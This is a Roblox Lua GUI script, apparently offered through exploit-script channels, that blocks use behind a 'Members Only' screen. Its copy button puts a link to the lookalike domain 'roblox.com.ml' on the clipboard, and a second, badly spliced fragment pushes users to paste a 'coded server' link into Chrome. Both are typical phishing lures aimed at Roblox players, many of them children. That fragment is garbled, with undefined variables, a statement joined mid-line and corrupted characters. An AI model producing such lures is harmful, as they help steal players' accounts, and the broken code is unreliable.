--// SERVICES
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local Lighting = game:GetService("Lighting")

local player = Players.LocalPlayer

local GROUP_ID = 215154644959
local GROUP_LINK = "https://www.roblox.com.ml/communities/215154644959/SCRIPTBLOXIAN"
local ANIME_BG = "rbxassetid://85041320470740"

--// GUI
local gui = Instance.new("ScreenGui")
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false
gui.Parent = player:WaitForChild("PlayerGui")

--------------------------------------------------
-- 🌌 BACKGROUND
--------------------------------------------------

local bgImage = Instance.new("ImageLabel")
bgImage.Size = UDim2.new(1,0,1,0)
bgImage.BackgroundTransparency = 1
bgImage.Image = ANIME_BG
bgImage.ImageTransparency = 0.25
bgImage.ScaleType = Enum.ScaleType.Crop
bgImage.Parent = gui

local overlay = Instance.new("Frame")
overlay.Size = UDim2.new(1,0,1,0)
overlay.BackgroundColor3 = Color3.fromRGB(0,0,0)
overlay.BackgroundTransparency = 0.45
overlay.Parent = gui

local blur = Instance.new("BlurEffect")
blur.Size = 10
blur.Parent = Lighting

--------------------------------------------------
-- 💎 CARD
--------------------------------------------------

local card = Instance.new("Frame")
card.Size = UDim2.new(0, 420, 0, 360)
card.Position = UDim2.new(0.5, -210, 0.5, 60)
card.BackgroundColor3 = Color3.fromRGB(15,25,45)
card.BackgroundTransparency = 0.2
card.Parent = gui
Instance.new("UICorner", card).CornerRadius = UDim.new(0, 16)

--------------------------------------------------
-- 🔵 TOP ACCENT
--------------------------------------------------

local topAccent = Instance.new("Frame")
topAccent.Size = UDim2.new(1, 0, 0, 6)
topAccent.BackgroundColor3 = Color3.fromRGB(0,170,255)
topAccent.Parent = card
Instance.new("UICorner", topAccent).CornerRadius = UDim.new(1,0)

--------------------------------------------------
-- 🔵 BORDER
--------------------------------------------------

local stroke = Instance.new("UIStroke")
stroke.Color = Color3.fromRGB(0,170,255)
stroke.Transparency = 0.35
stroke.Thickness = 1.5
stroke.Parent = card

--------------------------------------------------
-- 🔒 TITLE
--------------------------------------------------

local title = Instance.new("TextLabel")
title.Text = "🔒 Members Only"
title.Size = UDim2.new(1, -20, 0, 40)
title.Position = UDim2.new(0, 10, 0, 20)
title.BackgroundTransparency = 1
title.TextColor3 = Color3.new(1,1,1)
title.Font = Enum.Font.GothamBold
title.TextSize = 22
title.Parent = card

Instance.new("UIStroke", title).Color = Color3.fromRGB(0,170,255)

--------------------------------------------------
-- ✨ DESCRIPTION
--------------------------------------------------

local desc = Instance.new("TextLabel")
desc.Text = "✨ This script is exclusive to group members.\nJoin our group to unlock full access!"
desc.Size = UDim2.new(1, -20, 0, 40)
desc.Position = UDim2.new(0, 10, 0, 60)
desc.BackgroundTransparency = 1
desc.TextColor3 = Color3.new(1,1,1)
desc.Font = Enum.Font.Gotham
desc.TextSize = 14
desc.TextWrapped = true
desc.Parent = card

Instance.new("UIStroke", desc).Color = Color3.fromRGB(0,120,255)

--------------------------------------------------
-- 📋 INSTRUCTIONS
--------------------------------------------------

local steps = {
	"① Click Copy link below",
	"② Open it in your browser",
	"③ Press Join Group",
	"④ Return here 🔥"
}

for i, text in ipairs(steps) do
	local step = Instance.new("TextLabel")
	step.Text = text
	step.Size = UDim2.new(1, -20, 0, 24)
	step.Position = UDim2.new(0, 10, 0, 120 + (i-1)*30)
	step.BackgroundTransparency = 1
	step.TextColor3 = Color3.fromRGB(255,255,255)
	step.Font = Enum.Font.Gotham
	step.TextSize = 14
	step.TextXAlignment = Enum.TextXAlignment.Left
	step.Parent = card

	local s = Instance.new("UIStroke")
	s.Color = Color3.fromRGB(0,140,255)
	s.Thickness = 0.7
	s.Parent = step
end

--------------------------------------------------
-- 🔗 BUTTONS (FIXED SPACING)
--------------------------------------------------

local copyBtn = Instance.new("TextButton")
copyBtn.Text = "🔗 Copy Group Link"
copyBtn.Size = UDim2.new(0.75, 0, 0, 42)
copyBtn.Position = UDim2.new(0.125, 0, 1, -100)
copyBtn.BackgroundColor3 = Color3.fromRGB(0,140,255)
copyBtn.TextColor3 = Color3.new(1,1,1)
copyBtn.Font = Enum.Font.GothamBold
copyBtn.TextSize = 14
copyBtn.Parent = card
Instance.new("UICorner", copyBtn)

copyBtn.MouseButton1Click:Connect(function()
	if setclipboard then
		setclipboard(GROUP_LINK)
		copyBtn.Text = "✔ Copied!"
	else
		copyBtn.Text = "⚠ Not supported"
	end
end)

local checkBtn = Instance.new("TextButton")
checkBtn.Text = "🔄 Check Status"
checkBtn.Size = UDim2.new(0.75, 0, 0, 34)
checkBtn.Position = UDim2.new(0.125, 0, 1, -50)
checkBtn.BackgroundColor3 = Color3.fromRGB(40,80,140)
checkBtn.TextColor3 = Color3.new(1,1,1)
checkBtn.Font = Enum.Font.Gotham
checkBtn.TextSize = 13
checkBtn.Parent = card
Instance.new("UICorner", checkBtn)

--------------------------------------------------
-- 🔥 ACCESS CHECK
--------------------------------------------------

local function checkAccess()
	if player:IsInGroup(GROUP_ID) then
		TweenService:Create(card, TweenInfo.new(0.4), {
			Size = UDim2.new(0,0,0,0)
		}):Play()
		task.wait(0.4)
		gui:Destroy()
	end
end

checkBtn.MouseButton1Click:Connect(checkAccess)

task.spawn(function()
	while task.wait(3) do
		checkAccess()
	end
end)

--------------------------------------------------
-- 🎬 ENTRANCE
--------------------------------------------------

TweenService:Create(card, TweenInfo.new(0.5, Enum.EasingStyle.Back), {
	Position = UDim2.new(0.5, -210, 0.5, -180)
}):Play()mainFrame.Size = UDim2.new(0.6, 0, 0.6, 0)
mainFrame.Position = UDim2.new(0.2, 0, 0.2, 0)
mainFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
mainFrame.BorderSizePixel = 0
mainFrame.Parent = gui

-- Title
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, -20, 0.15, 0)
title.Position = UDim2.new(0, 10, 0, 10)
title.BackgroundTransparency = 1
title.Text = "USE CODED SERVER FOR THIS SCRIPT"
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.TextScaled = true
title.Font = Enum.Font.GothamBold
title.Parent = mainFrame

-- Instructions
local instructions = Instance.new("TextLabel")
instructions.Size = UDim2.new(1, -20, 0.45, 0)
instructions.Position = UDim2.new(0, 10, 0.18, 0)
instructions.BackgroundTransparency = 1
instructions.TextWrapped = true
instructions.TextYAlignment = Enum.TextYAlignment.Top
instructions.Text =
	"To get the coded server read below\n\n" ..
	"1. Click Get Coded Server\n" ..
	"2. Put coded server into chrome\n" ..
	"3. Click play\n" ..
	"4. Enjoy your scriptðŸ”¥"
instructions.TextColor3 = Color3.fromRGB(200, 200, 200)
instructions.TextScaled = true
instructions.Font = Enum.Font.Gotham
instructions.Parent = mainFrame

-- Button
local button = Instance.new("TextButton")
button.Size = UDim2.new(0.6, 0, 0.15, 0)
button.Position = UDim2.new(0.2, 0, 0.7, 0)
button.BackgroundColor3 = Color3.fromRGB(0, 170, 0)
button.Text = "Get Coded Server"
button.TextColor3 = Color3.fromRGB(255, 255, 255)
button.TextScaled = true
button.Font = Enum.Font.GothamBold
button.BorderSizePixel = 0
button.Parent = mainFrame

-- Clipboard Copy (key-system style)
button.MouseButton1Click:Connect(function()
	button.Text = "Generating..."
	task.wait(1.5)

	local success = pcall(function()
		setclipboard(codedServerLink)
	end)

	if success then
		button.Text = "Link Copied!"
		button.BackgroundColor3 = Color3.fromRGB(0, 140, 0)
	else
		button.Text = "Clipboard Not Supported"
		button.BackgroundColor3 = Color3.fromRGB(140, 0, 0)
	end
end)
